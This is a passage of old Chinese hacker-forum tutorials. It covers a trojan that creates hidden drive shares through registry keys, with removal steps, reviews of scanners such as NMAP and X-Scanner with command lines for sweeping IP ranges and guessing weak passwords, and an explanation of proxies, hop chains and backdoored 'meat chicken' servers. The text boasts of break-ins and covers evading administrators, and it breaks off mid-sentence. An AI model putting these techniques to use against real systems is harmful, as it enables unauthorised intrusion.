<BR>　　c15645b0 8000 "C:\WINDOWS\SYSTEM\SVRAPI.DLL" <BR>　　c1554190 f000 "C:\WINDOWS\SYSTEM\MPR.DLL" <BR>　　c154d180 a1207 "C:\WINDOWS\SYSTEM\USER.EXE" <BR>　　c1555ef0 13000 "C:\WINDOWS\SYSTEM\MSNET32.DLL" <BR><BR>　　但是為什么前輩我們看不到MSWINSCK.OCX或WSOCK2.VXD的調(diào)用呢？如果木馬想要進(jìn)行網(wǎng)絡(luò)通訊，是會(huì)使用一些socket調(diào)用的?！?<BR><BR>　　“那么接著你再觀察注冊(cè)表的變化。” <BR>　　“好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面，多了幾個(gè)鍵值，分別是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$，其內(nèi)部鍵值如下： <BR><BR>　　"Flags"=dword:00000302 <BR>　　"Type"=dword:00000000 <BR>　　"Path"="A:\\" 《-----路徑是A到F <BR>　　"Parm2enc"=hex: <BR>　　"Parm1enc"=hex: <BR>　　"Remark"="黑客帝國(guó)" <BR>　　” <BR>　　“這就對(duì)了，然后你在瀏覽器的地址欄輸入\\111.111.111.1\CJT_C$?！?<BR><BR>　　“啊！居然把我的C盤目錄文件顯示出來了?！?<BR>　　“現(xiàn)在你把CJT_C$改成matrix然后重啟計(jì)算機(jī)，接著在瀏覽器的地址欄輸入\\111.111.111.1\matrix?！?<BR><BR>　　“前輩也顯示C盤目錄文件了，很奇怪的是，在我的電腦里面硬盤看上去并沒有共享啊？” <BR>　　“哈哈，那你再把"Flags"=dword:00000302的302改成402，reboot計(jì)算機(jī)?！?<BR><BR>　　“嘻嘻，硬盤共享已顯示出來了。那么如何防止這種木馬那？” <BR>“哈哈哈哈，這種木馬只不過用了一個(gè)巧妙的方法隱藏起來而已。你現(xiàn)在把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$全部刪掉。如果你還放心不下，也可以把windows\system\下面的Vserver.vxd（Microsoft 網(wǎng)絡(luò)上的文件與打印機(jī)共享，虛擬設(shè)備驅(qū)動(dòng)程序）刪掉，再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的VSERVER鍵值刪掉。這樣就可以了。另外，對(duì)于驅(qū)動(dòng)程序/動(dòng)態(tài)鏈接庫(kù)木馬，有一種方法可以試試，使用Windows的〖系統(tǒng)文件檢查器〗，通過〖開始菜單〗－〖程序〗－〖附件〗－〖系統(tǒng)工具〗－〖系統(tǒng)信息〗－〖工具〗可以運(yùn)行〖系統(tǒng)文件檢查器〗，用〖系統(tǒng)文件檢查器〗可檢測(cè)操作系統(tǒng)文件的完整性，如果這些文件損壞，檢查器可以將其還原，檢查器還可以從安裝盤中解壓縮已壓縮的文件。如果你的驅(qū)動(dòng)程序或動(dòng)態(tài)鏈接庫(kù)在你沒有升級(jí)它們的情況下被改動(dòng)了，就有可能是木馬，提取改動(dòng)過的文件可以保證你的系統(tǒng)安全和穩(wěn)定?！?<BR><BR>　　六 <BR><BR>　　“此外很多人中木馬都會(huì)采用如下手段： <BR><BR>　　1．先跟你套近乎，冒充成漂亮的美眉或者其他的能讓你輕信的人，然后想方設(shè)法的騙你點(diǎn)他發(fā)給你的木馬。 <BR><BR>　　2．把木馬用工具和其它的軟件捆綁在一起，然后在對(duì)文件名字進(jìn)行修改，然后修改圖標(biāo)，利用這些虛假的偽裝欺騙麻痹大意的人。 <BR><BR>　　3．另外一種方法就是把木馬偽裝好后，放在軟件下載站中，著收漁翁之利。 <BR><BR>　　所以我這里提醒你一些常見的問題，首先是不要隨便從小的個(gè)人網(wǎng)站上下載軟件，要下也要到比較有名、比較有信譽(yù)的站點(diǎn)，通常這些網(wǎng)站的軟件比較安全。其次不要過于相信別人，不能隨便運(yùn)行別人給的軟件。而且要經(jīng)常檢查自己的系統(tǒng)文件、注冊(cè)表、端口等，而且多注意些安全方面的信息。再者就是改掉windows關(guān)于隱藏文件后綴名的默認(rèn)設(shè)置，這樣可以讓我們看清楚文件真正的后綴名字。最后要提醒你的是，如果有一天你突然發(fā)現(xiàn)自己的計(jì)算機(jī)硬盤莫名其妙的工作，或者在沒有打開任何連接的情況下，貓還在眨眼睛，就立刻斷線，進(jìn)行木馬的搜索?！?lt;/DIV>

<DIV class=tpc_content id=read_498>黑客常用兵器之掃面篇（上）<BR><BR>刀，兵器譜上排名第六。 <BR>　　刀； <BR>　　一把好刀，光亮如雪； <BR>　　刃； <BR>　　一抹利刃，吹發(fā)即斷； <BR><BR>　　黑客手中的掃描器如同刺客手中之刀，殺人、保命；攻擊、補(bǔ)漏。 <BR><BR>　　如果一個(gè)黑客手中沒有一兩個(gè)掃描器，那么他算不上是一個(gè)黑客，至少他是一個(gè)手里沒有“刀”的黑客。沒有“刀”的黑客是難以生存的……】 <BR><BR>　　“前輩，您為何如此看好掃描器？為什么黑客必須要有掃描器？” <BR><BR>　　“后生，你上次木馬害我不淺，你這次又像搞什么花樣？” <BR><BR>　　“上次小生只是跟前輩開了一個(gè)玩笑，還望前輩見諒?！?<BR><BR>　　“罷了，我老人家還不止于和你如此一般見識(shí)。此次你又有什么不清楚的？” <BR><BR>　　“我不太清楚掃描器為何會(huì)像您所說的有如此大的威力，掃描器在黑客攻擊中能起到什么作用？” <BR><BR>　　“看來你現(xiàn)在也是一個(gè)手里沒有刀的黑客，掃描器在一個(gè)成熟的黑客手里有著相當(dāng)大的作用。因?yàn)檫M(jìn)化到會(huì)用掃描器一級(jí)的黑客，他們就會(huì)很少有人在對(duì)那些無知的個(gè)人用戶感興趣，注意力更多的被吸引到了服務(wù)器上。而對(duì)付服務(wù)器最好的方法就是找到服務(wù)器系統(tǒng)的漏洞，或者服務(wù)器相關(guān)軟件的漏洞。對(duì)于傳統(tǒng)的手工查找來說，不但查找漏洞的速度過于緩慢，而且多數(shù)情況下只能針對(duì)某一個(gè)特定的漏洞，感覺有點(diǎn)大海撈針的味道。而掃描器就是一種快速尋找服務(wù)器系統(tǒng)相關(guān)漏洞的工具，通過它們，黑客可以根據(jù)自己的帶寬和系統(tǒng)情況，以他們自己喜歡的速度和方式來快速的尋找系統(tǒng)漏洞，而且這多數(shù)掃描器可以同時(shí)掃描多種漏洞，很容易找到系統(tǒng)的漏洞和弱點(diǎn)，此時(shí)黑客就可以根據(jù)掃描器提供的漏洞報(bào)告和信息，采用合適的攻擊方法對(duì)目標(biāo)給以致命的一擊?！?<BR><BR>　　“前輩，那我如何找到掃描器，平時(shí)我好像很少接觸到這些東西啊?！?<BR><BR>　　“呵呵，你用過小榕的流光系列嗎？” <BR><BR>　　“這個(gè)當(dāng)然是接觸過了。” <BR><BR>　　“其實(shí)小榕的流光就是一款結(jié)合強(qiáng)大掃描功能的軟件，只不過他在流光中加入了一些攻擊和破解成份。” <BR><BR>“掃描器果然強(qiáng)大，我就曾用流光攻破過許多的黃色和反動(dòng)網(wǎng)站，特別是他的FTP和新加入的SQLCMD功能，非常的強(qiáng)大。而且界面非常的友好，讓我這種菜鳥用戶很容易上手?！?<BR><BR><BR><BR>　　“你說的不錯(cuò)，但是雖然小榕的流光非常出色，并兼?zhèn)鋸?qiáng)大的破解和攻擊成份，但是總的來說它不能算的上是一個(gè)真正的掃描器。而且流光主要體現(xiàn)在破解，攻擊性很強(qiáng)，沒有太多的對(duì)目標(biāo)系統(tǒng)掃描后的分析報(bào)告，所以流光在我看來只能算是是一個(gè)涵蓋掃描功能的強(qiáng)大破解軟件。” <BR><BR>　　“那么在前輩的眼中，什么樣的軟件是一個(gè)強(qiáng)大的掃描軟件，什么樣的掃描器才能成為黑客手中的屠龍刀？” <BR><BR>　　“一個(gè)好的掃描器必須有簡(jiǎn)潔和易于使用的操作界面，強(qiáng)大的分析和掃描信息范圍，對(duì)最新漏洞的掃描判斷能力（也就是通常所說的升級(jí)概念），詳細(xì)的分析結(jié)果報(bào)告和對(duì)漏洞的描述與對(duì)策。這樣的“刀”才能算的上是黑客手中的一把寶刀。” <BR><BR>　　“前輩能否給我點(diǎn)評(píng)一下如今最為流行的掃描器的特點(diǎn)和性能呢？” <BR><BR>　　“說道當(dāng)今網(wǎng)絡(luò)安全界流行的掃描器，其中最為優(yōu)秀的就要算是ISS公司出品的商業(yè)掃描器了。它能針對(duì)上千種的系統(tǒng)和軟件漏洞對(duì)服務(wù)器作出全面的細(xì)微掃描，而且能夠生成比較詳細(xì)的掃描報(bào)告，應(yīng)該說是先進(jìn)最好的掃描器了?！?<BR><BR>　　“前輩這個(gè)掃描器我可以從什么地方下載？” <BR><BR>　　“無知！商業(yè)掃描器，當(dāng)然是不能免費(fèi)下載的了，你要花錢去買！” <BR><BR>　　“還需要花錢啊，哪有沒有不花錢的掃描器呢？” <BR><BR>　　“當(dāng)然有了，掃描器是黑客必備的工具之一，要是都花錢去買那不符合黑客的風(fēng)格。我們可以在網(wǎng)上找到很多免費(fèi)的而且同樣很優(yōu)秀的黑客掃描器。在國(guó)外比較常用的有Cerberus Internet Scanner簡(jiǎn)稱CIS，還有烏克蘭SATAN。我們國(guó)內(nèi)的也有安全焦點(diǎn)的X-Scanner，與小榕的流光。” <BR><BR>　　“前輩說的這幾種掃描器我只用過流光，我個(gè)人認(rèn)為流光很出色，其他的掃描器也只有所耳聞，但不知道有什么特點(diǎn)，還請(qǐng)前輩賜教?！?<BR><BR>　　“比起你用過的流光來說，ISS算得上是一個(gè)真正的管理員使用的系統(tǒng)掃描工具，首先它能掃描一些眾所周知的系統(tǒng)漏洞和系統(tǒng)弱點(diǎn)，包括一些往往被用戶忽略的問題，這些問題是一些經(jīng)常被黑客利用的漏洞和弱點(diǎn)。ISS有更為強(qiáng)大的漏洞分析功能，并且它不會(huì)允許非法訪問，但是實(shí)際情況是ISS已經(jīng)背離了它的初衷目的?！?<BR><BR>　　“任何好的事物都有不利的一面，更何況一把刀，而且是把寶刀。” <BR><BR>　　“這話不錯(cuò)，ISS的確是安全界最為出色的掃描器，而且他還是第一個(gè)可以公開得到的多層次掃描器。特別是它的可移植性和靈活性，眾多的UNIX的平臺(tái)上都可以運(yùn)行ISS，ISS的掃描時(shí)間和效率也是很快的，很適合于企業(yè)級(jí)的用戶?！?<BR>“前輩，我插一句話，雖然ISS足夠強(qiáng)大，但是它畢竟不是免費(fèi)的午餐，這就不符合我們的黑客精神了。您那里有沒有一些強(qiáng)大而且免費(fèi)的掃描器？” <BR><BR>　　“掃描器龐大的家族中怎么會(huì)沒有免費(fèi)的，你聽說過NMAP嗎？” <BR><BR>　　“NMAP倒是有所耳聞，以前在許多安全網(wǎng)站上見到過這個(gè)名字，但是我不知道它是干什么用的一個(gè)東西?！?<BR><BR>　　“NMAP其實(shí)就是一個(gè)功能強(qiáng)大的掃描器。它的強(qiáng)大之處在于它支持UDP，TCP (connect)，TCP SYN(half open)，ftp proxy(bounce attack)，Reverse-ident，ICMP(ping sweep)，F(xiàn)IN，ACK sweep，Xmas Tree，SYN sweep，Null等多種掃描協(xié)議和掃描方式。但是總的來說它的最大的優(yōu)點(diǎn)莫過于隱蔽性高，這是由于它采用的是“半開”的一種掃描方式，此外它提供的Stealth FIN，Xmas Tree與Null掃描模式更是讓被掃描者難以發(fā)現(xiàn)。也正是因?yàn)檫@一點(diǎn)的原因，NMAP深受一些骨灰級(jí)黑客的喜愛。像一般黑客喜歡的秘密掃描、動(dòng)態(tài)延遲、重發(fā)與平行掃描、欺騙掃描、端口過濾探測(cè)、RPC直接掃描、分布掃描等，NMAP均可以實(shí)現(xiàn)，可以說NMAP是一個(gè)靈活性很大的掃描器。通過強(qiáng)大系統(tǒng)的掃描，它還可以分析出服務(wù)器的端口處于Open狀態(tài)還是被防火墻保護(hù)狀態(tài)。總之它的強(qiáng)大是不言而喻的，如果你有一臺(tái)聯(lián)網(wǎng)的Linux或者UNIX計(jì)算機(jī)，那么你就可以去<A href="http://www.insecure.org/nmap/" target=_blank><FONT color=#2f5fa1>http://www.insecure.org/nmap/</FONT></A> 下載得到它。</DIV>

<DIV class=tpc_content id=read_499>黑客常用兵器之掃描篇（下）<BR><BR><BR>　　“前輩，我的系統(tǒng)使用的是Windows，您能不能介紹一些我這種菜鳥級(jí)黑客也能用的掃描器？當(dāng)然前提是在Windows系統(tǒng)下運(yùn)行啊?！?<BR><BR>　　“既然這樣，我想Cerberus Internet Scanner(CIS)可能比較合適與你，它主要運(yùn)行在Windows NT和Windows2000的平臺(tái)下面，當(dāng)然它也主要是針對(duì)微軟的Windows操作系統(tǒng)進(jìn)行探測(cè)掃描的。CIS擁有絕大多數(shù)菜鳥喜歡的Windows友好界面，而且它提供進(jìn)行掃描的安全問題也是通常在Windows中經(jīng)常見到的，其中包括： <BR>　?。?） WWW服務(wù) <BR>　?。?） FTP服務(wù) <BR>　?。?） MS SQL Server 數(shù)據(jù)庫(kù)掃描 <BR>　?。?） NetBIOS 共享掃描 <BR>　?。?） 注冊(cè)表設(shè)置 <BR>　?。?） NT服務(wù)漏洞 <BR>　　（7） SMTP服務(wù)掃描 <BR>　?。?） POP3服務(wù)掃描 <BR>　　（9） RPC服務(wù)掃描 <BR>　?。?0） 端口映射 <BR>　?。?1） Finger服務(wù) <BR>　?。?2） DNS安全掃描 <BR>　?。?3） 瀏覽器安全等 <BR><BR><BR><BR>　　在CIS中，它最為引人注目的還要數(shù)NetBIOS共享掃描。CIS能根據(jù)NetBIOS這一漏洞作出NETBIOS資源信息、共享資源、計(jì)算機(jī)用戶名、工作組和薄弱的用戶口令等詳細(xì)的掃描分析。它的操作方法也是非常的容易，你只需要輸入目標(biāo)服務(wù)器的地址，然后選擇你想要掃描的相關(guān)漏洞就可以進(jìn)行掃描分析了。掃描完畢后他會(huì)主動(dòng)生成一個(gè)HTML的報(bào)告共你分析結(jié)果。你可以在<A href="http://www.cerberus-infosec.co.uk/" target=_blank><FONT color=#2f5fa1>http://www.cerberus-infosec.co.uk/</FONT></A> 下載獲得?！?<BR><BR>“這款掃描器的功能是否太過于簡(jiǎn)單了哪？我感覺它比起前幾個(gè)您說的那些掃描器，功能過于少了，而且沒有流光那么有成效。” <BR><BR><BR>　　“SATAN作為掃描器的鼻祖可能很適合你，由于它采用的是一個(gè)Perl的內(nèi)核，通過PERL調(diào)用大量的C語言的檢測(cè)工具對(duì)目標(biāo)網(wǎng)站進(jìn)行分析，所以你打開瀏覽器用IE方式就可以直接操作，使用也相對(duì)簡(jiǎn)單，我就不在這里介紹他浪費(fèi)時(shí)間了。 <BR><BR>　　作為黑客的利刃，國(guó)產(chǎn)的CGI &amp; Web Scanner也是一個(gè)不錯(cuò)的掃描器，這個(gè)寶刀是由zer9設(shè)計(jì)完成打造的。這款掃描器主要是針對(duì)動(dòng)態(tài)網(wǎng)站技術(shù)的安全問題來設(shè)計(jì)的?！?<BR><BR>　　“動(dòng)態(tài)網(wǎng)站？” <BR><BR>　　“對(duì)，動(dòng)態(tài)網(wǎng)站。隨著網(wǎng)站設(shè)計(jì)的日趨復(fù)雜化，網(wǎng)站的技術(shù)人員會(huì)利用一些諸如CGI、ASP、PHP、jsP等網(wǎng)站動(dòng)態(tài)交互技術(shù)與相應(yīng)的服務(wù)軟件對(duì)網(wǎng)站進(jìn)行開發(fā)，這些東西大大地減輕了網(wǎng)站的維護(hù)和更新工作量，但是也正是這些技術(shù)，導(dǎo)致了大量的安全問題，特別是很多網(wǎng)站動(dòng)態(tài)第三方程序在設(shè)計(jì)之初根本就沒有對(duì)安全問題考慮太多，導(dǎo)致了大量的系統(tǒng)漏洞的出現(xiàn)。而CGI &amp; Web Scanner就是專門針對(duì)這些動(dòng)態(tài)的網(wǎng)頁上出現(xiàn)的漏洞進(jìn)行掃描的一把利刃。 <BR><BR>　　CGI &amp; Web Scanner的主要功能有： <BR>　?。?） 檢測(cè)203個(gè)已知的CGI漏洞 <BR>　?。?） 通過HTTPD辨認(rèn)服務(wù)器類型 <BR>　?。?） 有更新漏洞的功能 <BR>　?。?） Microsoft SQL Server DOS檢測(cè) <BR>　?。?） Httpd Overflow檢測(cè) <BR>　?。?） IIS Hack檢測(cè) <BR>　　（7） ASP檢測(cè) <BR>　?。?） DOT 漏洞檢測(cè) <BR><BR>　　而且它可以多線程掃描，并對(duì)常見的D.O.S（拒絕服務(wù)攻擊）和Overflow等也進(jìn)行探測(cè)，很適合初級(jí)殺手作為武器。至于你關(guān)心的使用方法，就更為簡(jiǎn)單了，輸入目標(biāo)服務(wù)器的IP地址，選擇需要掃描的漏洞種類點(diǎn)擊掃描按鍵，就開始了?！?<BR><BR><BR>　　“沒有想到國(guó)產(chǎn)掃描器還有如此優(yōu)秀的！” <BR><BR>　　“這個(gè)是自然，作為黑客的必備武器之一，國(guó)產(chǎn)掃描器有很多優(yōu)秀的作品，前面我提到的安全焦點(diǎn)的X-Scanner，就是我最為欣賞的掃描器，而且我老人家也時(shí)常常的使用，但是不知道為什么，在對(duì)X-Scanner進(jìn)行病毒測(cè)試的時(shí)候，熊貓和KV3000都能在X-Scanner里面發(fā)現(xiàn)兩個(gè)木馬程序。這一點(diǎn)是我們要非常的注意的。當(dāng)然也要請(qǐng)安全焦點(diǎn)的朋友做做解釋工作?！?<BR><BR>　　“前輩既然如此欣賞X-Scanner，那就給我詳細(xì)介紹一下吧！” <BR><BR><BR><BR>　　“X-Scanner運(yùn)行在Windows平臺(tái)下，它主要針對(duì)WindowsNT/Windows 2000操作系統(tǒng)的安全進(jìn)行全面細(xì)致評(píng)估，可以掃描出很多Windows系統(tǒng)流行的漏洞，并詳細(xì)的指出安全的脆弱環(huán)節(jié)與彌補(bǔ)措施。X-Scanner采用多線程方式對(duì)指定IP地址段(或單機(jī))進(jìn)行安全漏洞掃描，支持插件功能，提供了圖形界面和命令行兩種操作方式。 <BR>　掃描范圍包括： <BR>　?。?）標(biāo)準(zhǔn)端口狀態(tài)及端口banner信息； <BR>　?。?）CGI漏洞； <BR>　?。?）RPC漏洞； <BR>　?。?）SQL-SERVER默認(rèn)帳戶； <BR>　?。?）FTP弱口令； <BR>　?。?）NT主機(jī)共享信息； <BR>　?。?）用戶信息； <BR>　?。?）組信息； <BR>　?。?）NT主機(jī)弱口令用戶等。 <BR><BR>　　X-Scanner會(huì)將掃描結(jié)果保存在/log/目錄中，index_*.htm為掃描結(jié)果索引文件。并對(duì)于一些已知漏洞，X-Scanner給出了相應(yīng)的漏洞描述，利用程序及解決方案。X-Scanner掃描的內(nèi)容是絕大多數(shù)的服務(wù)器容易出現(xiàn)的漏洞和安全設(shè)置問題。最常用的還是其中的SQL默認(rèn)帳戶、FTP弱口令和共享掃描，他們能揭示出許多麻痹大意的網(wǎng)管犯的一些低級(jí)錯(cuò)誤?！?<BR><BR><BR>　　“前輩能不能具體說說X-Scanner如何使用呢？” <BR><BR>　　“打開了X-Scanner，在掃描項(xiàng)目中可以任意的指定單獨(dú)掃描哪一個(gè)特定的項(xiàng)目。比較多的是CGI和SQL或者FTP默認(rèn)口令，這些都是很致命的服務(wù)器漏洞?！?<BR><BR><BR><BR>　　“下一步需要在〖掃描設(shè)置〗中進(jìn)行參數(shù)的設(shè)置。一般的情況下，只對(duì)〖運(yùn)行參數(shù)〗中的掃描范圍進(jìn)行設(shè)置。在那里只要填寫網(wǎng)站服務(wù)器的IP地址就可以，可以填寫一個(gè)來針對(duì)某一個(gè)特定的網(wǎng)站或服務(wù)器，也可以填寫一個(gè)IP段范圍，來掃描一段IP地址上所有的計(jì)算機(jī)。具體掃描參數(shù)格式如下： <BR><BR>　　1.命令行：Xscan -h [起始地址]&lt;-[終止地址]&gt; [掃描選項(xiàng)] <BR><BR>　　 其中的[掃描選項(xiàng)]含義如下： <BR>　　 -p: 掃描標(biāo)準(zhǔn)端口(端口列表可通過\dat\config.ini文件定制)； <BR>　　 -b: 獲取開放端口的banner信息，需要與-p參數(shù)合用； <BR>　　 -c: 掃描CGI漏洞； <BR>　　 -r: 掃描RPC漏洞； <BR>　　 -s: 掃描SQL-SERVER默認(rèn)帳戶； <BR>　　 -f: 嘗試FTP默認(rèn)用戶登錄(用戶名及口令可以通過\dat\config.ini文件定制)； <BR>　　 -n: 獲取NetBios信息(若遠(yuǎn)程主機(jī)操作系統(tǒng)為Windows9x/NT4.0/2000)； <BR>　　 -g: 嘗試弱口令用戶連接(若遠(yuǎn)程主機(jī)操作系統(tǒng)為Windows NT4.0/2000)； <BR>　　 -a: 掃描以上全部?jī)?nèi)容； <BR><BR>-x [代理服務(wù)器:端口]: 通過代理服務(wù)器掃描CGI漏洞； <BR>　　 -t: 設(shè)置線程數(shù)量，默認(rèn)為20個(gè)線程； <BR>　　 -v: 顯示詳細(xì)掃描進(jìn)度； <BR>　　 -d: 禁止掃描前PING被掃主機(jī)。 <BR><BR>　　2.示例： <BR>　　Xscan -h xxx.xxx.1.1-xxx.xxx.10.255 -a <BR>　　含義：掃描XXX.XXX.1.1-XXX.XXX.10.255網(wǎng)段內(nèi)主機(jī)的所有信息； <BR><BR>　　Xscan -h xxx.xxx.1.1 -n -g -t 30 <BR>　　含義：獲取XXX.XXX.1.1主機(jī)的Netbios信息，并檢測(cè)NT弱口令用戶，線程數(shù)量為30； <BR><BR>　　Xscan -h xxx.xxx.1.1 -p -b -c -x 129.66.58.13:80 -v -d <BR>　　含義：掃描xxx.xxx.1.1主機(jī)的標(biāo)準(zhǔn)端口狀態(tài)，通過代理服務(wù)器"129.66.58.13:80"掃描CGI漏洞，檢測(cè)端口banner信息，且掃描前不通過PING命令檢測(cè)主機(jī)狀態(tài)，顯示詳細(xì)掃描進(jìn)度?！?<BR><BR><BR><BR>　　“在〖運(yùn)行參數(shù)〗中，有很大的選擇余地，比如它可以設(shè)置代理服務(wù)器來躲避網(wǎng)管的追查，并課以設(shè)置掃描的線程。對(duì)掃描顯示也可以進(jìn)行詳細(xì)的選擇。然后掃描器就開始工作了?！?<BR><BR>　　“好啊，我去試試?！?<BR><BR>　　“另外我要提醒你注意的是，在使用這些掃描軟件的時(shí)候一定要看清楚里面有沒有可以的程序，以防自己先中了別人的招。此外，雖然你刺客手中有刀，但是現(xiàn)在的網(wǎng)站管理員也會(huì)使用這些寶刀，所以說，手中有絕世好刀，不一定就能殺死所有的敵人。好了，你去吧！”</DIV>

<DIV class=tpc_content id=read_500>代理、肉雞、跳板的概念<BR><BR>看到有的網(wǎng)友還用那種8080、80端口的代理，我有話說，也可以說為大家做一點(diǎn)最最基礎(chǔ)的黑客教程，大家看完自己去做吧，具體怎么做，我就不說了，可以說我把我所知道的肉雞和跳板的概念知識(shí)全部告訴大家了，我也在幾個(gè)地方發(fā)表過，這是我的原創(chuàng)，我要告訴大家的是真正在黑客搶劫服務(wù)器是用的跳板是什么，以及黑客們很少說的跳板知識(shí)介紹~~~~~~~~~~我有個(gè)習(xí)慣，<BR>總是喜歡讓大家看一篇文章的時(shí)候知道：為 什么要看這篇文章？這篇文章要讓<BR>自己知道或是學(xué)到什么東西，我盡量把自己所 掌握的東西盡量簡(jiǎn)化后用通俗的<BR>語言表達(dá)。大家看完后有什么不好的地方，請(qǐng)指出，我好學(xué)習(xí)到新的東西，我很高興自己能<BR>把自己所學(xué)到的東西和大家分享，在 這里的認(rèn)識(shí)的網(wǎng)友們有想成為黑客的；有<BR>想隨便玩玩；有的想學(xué)，但是不久就感<BR>覺學(xué)網(wǎng)絡(luò)安全很難就退卻了。我真的很希望大家能找到自己的目標(biāo)，做自己喜歡<BR>的事情，不要一天就黑小企鵝和一天泡在別人的軟件里（至少要嘗試讀一些簡(jiǎn)單的<BR><BR>代碼），學(xué)習(xí)黑客知識(shí)是孤獨(dú)的，必須完全靠自己的努力，很少有人能幫你的，<BR><BR>開始你會(huì)覺得很無助，但是慢慢的，你將習(xí)慣這種感覺和方式，要自己努力才會(huì)<BR><BR>有成果的，我和大家一樣也在不停的探索網(wǎng)絡(luò)知識(shí)，現(xiàn)在不過是把自己學(xué)到的東<BR><BR>西和大家分享罷了。是不是我象大姨媽啊??！呵呵~~~婆婆***！我看到很<BR>多的網(wǎng)友聊代理的時(shí)候，概念很模糊，甚至搞出了笑話，所以今天我就談?wù)労芏?lt;BR>朋友初涉網(wǎng)安的一個(gè)<BR><BR>誤區(qū)（認(rèn)識(shí)代理、跳板、肉雞）。有的網(wǎng)友說那還不簡(jiǎn)單，找個(gè)運(yùn)行就能隱藏IP<BR><BR>的軟件，我早說過了，我沒有見過這種軟件或許說根本不存在這種軟件（懶惰的<BR><BR>人更勤于此道）再者對(duì)搶劫服務(wù)器者而言把自己的身家性命放在一個(gè)隱藏自己IP的軟件<BR><BR>上是很不明智的，要知道搶劫服務(wù)器時(shí)會(huì)嘗試很多的連接，在你一不小心的時(shí)候你就把<BR><BR>自己賣了（我曾經(jīng)在一次搶劫服務(wù)器完畢后沒有用sc32設(shè)置好跳板的IE，而是隨手在<BR><BR>桌面上雙擊瀏覽器去看黑頁，結(jié)果把自己給賣了，本來沒有什么可怕的，但是我<BR><BR>們要養(yǎng)成做任何事都無懈可擊的習(xí)慣。再者~~~噓噓~~還好是RB鬼子的系統(tǒng)<BR><BR>。）所以我根本不相信什么隱藏IP的軟件，也許我孤陋寡聞或是真有這樣的東西<BR><BR>，但至少我是不會(huì)用的，除非有人張羅著把我斃了，那么我可以考慮一下。<BR><BR>我要說此文適合菜鳥閱讀，高手止步?。?！<BR><BR>我上小企鵝，老有網(wǎng)友問我代理和跳板以及肉雞是指同一類概念嗎？它們?cè)趺礃庸?lt;BR><BR>作的？<BR><BR>因?yàn)樵谛∑簌Z上不可能講很清楚，涉及的東西太多了，因?yàn)榇宋氖敲嫦蚝臀乙粯映?lt;BR><BR><BR>人涉網(wǎng)絡(luò)網(wǎng)絡(luò)安全的朋友，那么我就簡(jiǎn)單的說說。<BR><BR>首先是代理（泛指80；8080；1080端口），很多網(wǎng)友認(rèn)為用代理獵手設(shè)置好<BR><BR>端口之后就可以為自己找個(gè)代理在IE、FTP等里面設(shè)置后來隱藏IP，這就是肉雞<BR><BR>或認(rèn)為這就是跳板，其實(shí)不然，為什么呢？就我個(gè)人來看這樣的代理簡(jiǎn)直就是垃<BR><BR>圾（有的網(wǎng)友不服氣了，等等，我一會(huì)告訴你為什么我這么說），1、首先一個(gè)<BR><BR>速度比較慢，我用這樣的代理用過很多國(guó)家，包括國(guó)內(nèi)的，感覺都是其慢，沒有<BR><BR>那種快速的感覺；2、不穩(wěn)定。大家一定都想擁有一個(gè)穩(wěn)定的代理吧~~~呵呵<BR><BR>但是這樣的代理通常有原因的，不是服務(wù)器自身漏洞就是為了自身利益而增加的<BR><BR>服務(wù)，當(dāng)他的愿望達(dá)成以后或是網(wǎng)管發(fā)現(xiàn)以后，你就不能再用了。3、多人使用。如果你<BR><BR>用8080、1080、80等端口的代理，我敢保證這個(gè)代理不止你一個(gè)人用，如果<BR><BR>你想成為一個(gè)黑客或是老手的話，擁有一個(gè)自己的代理是必須的。4、保密性。<BR><BR>有的代理服務(wù)器提供者很可惡，他們利用代理得知你的密碼或一些敏感信息，因<BR><BR>為普通代理數(shù)據(jù)沒有經(jīng)過加密（1080端口除外），用一個(gè)嗅探器就可以知道你<BR><BR>輸入的數(shù)據(jù)，別忘了代理的最最基本原理是數(shù)據(jù)轉(zhuǎn)發(fā)喲。好了，有了以上的缺點(diǎn)<BR><BR>你還敢用或是有信心用它嗎？這就是我為什么叫它垃圾的原因了。有網(wǎng)友會(huì)問：<BR><BR>那什么樣的代理才沒有這些缺點(diǎn)呢？別急，我下面就要說。<BR><BR>socks5.這是一個(gè)很不錯(cuò)的跳板軟件，很?。?2K）功能卻是不凡，它是sock4<BR><BR>的接替者，原來的sock4只支持UDP協(xié)議（這個(gè)大家去看書吧，我不多說了），<BR><BR>而sock5支持USP和TCP兩種協(xié)議，還有數(shù)據(jù)的傳輸是加密的所以真的很佩服作者的編程能力。如果你簡(jiǎn)<BR><BR>單的使用它，那你上個(gè)小企鵝啊或IRC啦，那是沒有什么問題啦，而且它的速度很快<BR><BR>幾乎和你使用本地機(jī)沒有什么差別（當(dāng)然不能加太多跳板），sock5支持你搭建<BR><BR>255個(gè)跳板，也就是你可以用skserverGUI來編輯多達(dá)255個(gè)安裝了sock5的機(jī)<BR><BR>器來運(yùn)行達(dá)到你隱藏IP的目的，但我想如果我看見有人這樣做的話，我會(huì)馬上打<BR><BR>電話到精神病院~~~：）而且用sc32來配合skserverGUI的話，那么你的電腦<BR><BR>幾乎就沒有應(yīng)用程序不能用代理的。你用過之后一定會(huì)說：我喜歡！我選擇！sock5的安裝也很簡(jiǎn)單，在此軟件的說明書里有，因?yàn)槲抑饕亲尨蠹伊私獯?-----&amp;g*;跳板------&amp;g*;肉雞的簡(jiǎn)單原理；再者因?yàn)橹谱鬟@樣的跳板或肉雞很有攻擊性（會(huì)構(gòu)成非法使用<BR><BR>他人電腦），而且網(wǎng)上有很多人不自覺，我可不想以后有人被抓了，說我<BR><BR>曾經(jīng)為他的犯罪生涯做過貢獻(xiàn)。<BR><BR>好了！最后我們來說說肉雞吧<BR><BR>肉雞是什么？在小企鵝上也有朋友問我，我認(rèn)為這是中國(guó)黑客對(duì)自己開了后門的服<BR><BR>務(wù)器為將來自己做一些事時(shí)使用的機(jī)器的一種自豪而又親切的叫法.肉雞是老手<BR><BR>常用的代理，也就是*elne*的那種，完全是靠自己制作的，端口加密碼啦！絕對(duì)<BR><BR>只有你一個(gè)人用，當(dāng)然被別人提前下手的話，那你就清除它的后門就可以了，當(dāng)<BR><BR>你第一次擁有這種服務(wù)器的時(shí)候你的心情是什么樣的？我個(gè)人感覺是象初戀一樣<BR><BR>。<BR><BR>有3389肉雞通?？梢詧D形化*作，從而發(fā)動(dòng)